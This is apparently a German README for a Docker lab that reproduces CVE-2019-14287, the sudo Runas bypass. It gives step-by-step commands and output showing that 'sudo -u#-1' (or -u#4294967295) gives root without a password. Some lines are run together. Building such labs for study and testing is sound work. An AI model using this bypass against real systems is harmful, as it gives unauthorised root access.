
Docker-basierter PoC, der CVE-2019-14287 sudo-Privilegieneskalation durch Umgehung der Runas-Benutzereinschränkung demonstriert, mit Schritt-für-Schritt-Reproduktionsanweisungen
Dies ist ein Beispiel, um die Sicherheitslücke in sudo (CVE-2019-14287) in einem Docker-Container nachzubilden.
docker compose up -d, um den Container zu startendocker exec -it vulnerable_sudo_app bash, um in den Container zu gelangenwhoami und id aus, um zu bestätigen, dass du ein normaler Benutzer bist (nicht root)
$ whoami
user1
$ id
uid=1000(user1) gid=1000(user1) groups=1000(user1)
$ id -u
1000
sudo -u#0 whoami und sudo -u#0 id -u nicht ausgeführt werden können
-u an$ sudo -u#0 whoami
[sudo] password for user1:
$ sudo -u#0 id
[sudo] password for user1:
$ sudo -u#0 id -u
[sudo] password for user1:
sudo -u#-1 whoami und sudo -u#-1 id -u aus, um zu bestätigen, dass der Befehl ohne Authentifizierung als root ausgeführt werden kann (Nachstellung der Sicherheitslücke)
-u#4294967295 funktioniert ebenfalls$ sudo -u#-1 whoami
root
$ sudo -u#-1 id
uid=0(root) gid=1000(user1) groups=1000(user1)
$ sudo -u#-1 id -u
0